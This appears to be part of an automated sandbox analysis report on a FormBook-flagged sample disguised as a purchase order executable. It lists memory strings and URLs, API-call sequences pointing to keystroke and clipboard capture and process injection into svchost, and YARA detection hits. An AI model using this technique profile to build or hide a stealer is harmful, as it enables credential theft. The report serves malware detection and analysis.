Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121004360227.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121050155085.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121107457674.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121118333732.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121333505679.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121345197560.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121352209002.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121401562198.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121421216122.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121424131858.jpg
Source: HOSTNAME.EXE, 0000000A.00000002.3623159413.0000000006120000.00000004.00000800.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621377097.0000000004986000.00000004.10000000.00040000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000003E96000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121430278862.jpg
Source: HOSTNAME.EXE, 0000000A.00000003.1681285521.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: HOSTNAME.EXE, 0000000A.00000003.1681285521.0000000007B6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00DC4164

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DC4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00DC4164

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DC3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00DC3F66

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DB001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00DB001C

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00DDCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1491941126.0000000002F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1490919657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619572646.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3620847794.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3619265503.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1492752235.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3620880215.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00D53B3A
Source: PURCHASE ORDER N0259305-06SN.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1185302072.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_37f4ae14-3
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1185302072.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2797caf7-c

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PURCHASE ORDER N0259305-06SN.exe

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D53633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00D53633
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_00DDC1AC
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_00DDC498
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_00DDC5FE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC57D SendMessageW,NtdllDialogWndProc_W,	0_2_00DDC57D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC88F NtdllDialogWndProc_W,	0_2_00DDC88F
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC8BE NtdllDialogWndProc_W,	0_2_00DDC8BE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC860 NtdllDialogWndProc_W,	0_2_00DDC860
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC909 NtdllDialogWndProc_W,	0_2_00DDC909
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDC93E ClientToScreen,NtdllDialogWndProc_W,	0_2_00DDC93E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00DDCABC
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDCA7C GetWindowLongW,NtdllDialogWndProc_W,	0_2_00DDCA7C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D51290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_00D51290
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D51287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74E0C8D0,NtdllDialogWndProc_W,	0_2_00D51287
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDD3B8 NtdllDialogWndProc_W,	0_2_00DDD3B8
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_00DDD43E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D516DE GetParent,NtdllDialogWndProc_W,	0_2_00D516DE
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D516B5 NtdllDialogWndProc_W,	0_2_00D516B5
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D5167D NtdllDialogWndProc_W,	0_2_00D5167D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDD78C NtdllDialogWndProc_W,	0_2_00DDD78C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D5189B NtdllDialogWndProc_W,	0_2_00D5189B
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDBC5D NtdllDialogWndProc_W,CallWindowProcW,	0_2_00DDBC5D
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_00DDBF8C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DDBF30 NtdllDialogWndProc_W,	0_2_00DDBF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CBD3 NtClose,	1_2_0042CBD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B60 NtClose,LdrInitializeThunk,	1_2_03172B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03172DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03172C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,	1_2_031735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174340 NtSetContextThread,	1_2_03174340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03174650 NtSuspendThread,	1_2_03174650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172B80 NtQueryInformationFile,	1_2_03172B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BA0 NtEnumerateValueKey,	1_2_03172BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BF0 NtAllocateVirtualMemory,	1_2_03172BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172BE0 NtQueryValueKey,	1_2_03172BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AB0 NtWaitForSingleObject,	1_2_03172AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AD0 NtReadFile,	1_2_03172AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172AF0 NtWriteFile,	1_2_03172AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F30 NtCreateSection,	1_2_03172F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F60 NtCreateProcessEx,	1_2_03172F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172F90 NtProtectVirtualMemory,	1_2_03172F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FB0 NtResumeThread,	1_2_03172FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FA0 NtQuerySection,	1_2_03172FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172FE0 NtCreateFile,	1_2_03172FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E30 NtWriteVirtualMemory,	1_2_03172E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172E80 NtReadVirtualMemory,	1_2_03172E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EA0 NtAdjustPrivilegesToken,	1_2_03172EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172EE0 NtQueueApcThread,	1_2_03172EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D10 NtMapViewOfSection,	1_2_03172D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D00 NtSetInformationFile,	1_2_03172D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172D30 NtUnmapViewOfSection,	1_2_03172D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DB0 NtEnumerateKey,	1_2_03172DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172DD0 NtDelayExecution,	1_2_03172DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C00 NtQueryInformationProcess,	1_2_03172C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172C60 NtCreateKey,	1_2_03172C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CA0 NtQueryInformationToken,	1_2_03172CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CC0 NtQueryVirtualMemory,	1_2_03172CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03172CF0 NtOpenProcess,	1_2_03172CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173010 NtOpenDirectoryObject,	1_2_03173010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173090 NtSetValueKey,	1_2_03173090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031739B0 NtGetContextThread,	1_2_031739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D10 NtOpenProcessToken,	1_2_03173D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03173D70 NtOpenThread,	1_2_03173D70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C4340 NtSetContextThread,LdrInitializeThunk,	10_2_031C4340
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C4650 NtSuspendThread,LdrInitializeThunk,	10_2_031C4650
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2B60 NtClose,LdrInitializeThunk,	10_2_031C2B60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_031C2BA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_031C2BF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_031C2BE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2AD0 NtReadFile,LdrInitializeThunk,	10_2_031C2AD0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2AF0 NtWriteFile,LdrInitializeThunk,	10_2_031C2AF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2F30 NtCreateSection,LdrInitializeThunk,	10_2_031C2F30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2FB0 NtResumeThread,LdrInitializeThunk,	10_2_031C2FB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2FE0 NtCreateFile,LdrInitializeThunk,	10_2_031C2FE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_031C2E80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_031C2EE0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_031C2D10
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_031C2D30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_031C2DD0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_031C2DF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_031C2C70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2C60 NtCreateKey,LdrInitializeThunk,	10_2_031C2C60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_031C2CA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C35C0 NtCreateMutant,LdrInitializeThunk,	10_2_031C35C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C39B0 NtGetContextThread,LdrInitializeThunk,	10_2_031C39B0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2B80 NtQueryInformationFile,	10_2_031C2B80
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2AB0 NtWaitForSingleObject,	10_2_031C2AB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2F60 NtCreateProcessEx,	10_2_031C2F60
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2F90 NtProtectVirtualMemory,	10_2_031C2F90
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2FA0 NtQuerySection,	10_2_031C2FA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2E30 NtWriteVirtualMemory,	10_2_031C2E30
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2EA0 NtAdjustPrivilegesToken,	10_2_031C2EA0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2D00 NtSetInformationFile,	10_2_031C2D00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2DB0 NtEnumerateKey,	10_2_031C2DB0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2C00 NtQueryInformationProcess,	10_2_031C2C00
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2CC0 NtQueryVirtualMemory,	10_2_031C2CC0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C2CF0 NtOpenProcess,	10_2_031C2CF0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C3010 NtOpenDirectoryObject,	10_2_031C3010
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C3090 NtSetValueKey,	10_2_031C3090
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C3D10 NtOpenProcessToken,	10_2_031C3D10
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031C3D70 NtOpenThread,	10_2_031C3D70
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00899660 NtCreateFile,	10_2_00899660
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008997D0 NtReadFile,	10_2_008997D0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008998C0 NtDeleteFile,	10_2_008998C0
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00899960 NtClose,	10_2_00899960
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00899AD0 NtAllocateVirtualMemory,	10_2_00899AD0

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00DBA1EF

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74795590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00DA8310

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00DB51BD

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7D975	0_2_00D7D975
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D721C5	0_2_00D721C5
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D862D2	0_2_00D862D2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DD03DA	0_2_00DD03DA
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D8242E	0_2_00D8242E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D725FA	0_2_00D725FA
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D666E1	0_2_00D666E1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D5E6A0	0_2_00D5E6A0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DAE616	0_2_00DAE616
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D8878F	0_2_00D8878F
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB8889	0_2_00DB8889
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DD0857	0_2_00DD0857
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D86844	0_2_00D86844
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D68808	0_2_00D68808
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7CB21	0_2_00D7CB21
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D86DB6	0_2_00D86DB6
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D66F9E	0_2_00D66F9E
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D63030	0_2_00D63030
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D7F1D9	0_2_00D7F1D9
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D73187	0_2_00D73187
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D51287	0_2_00D51287
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D71484	0_2_00D71484
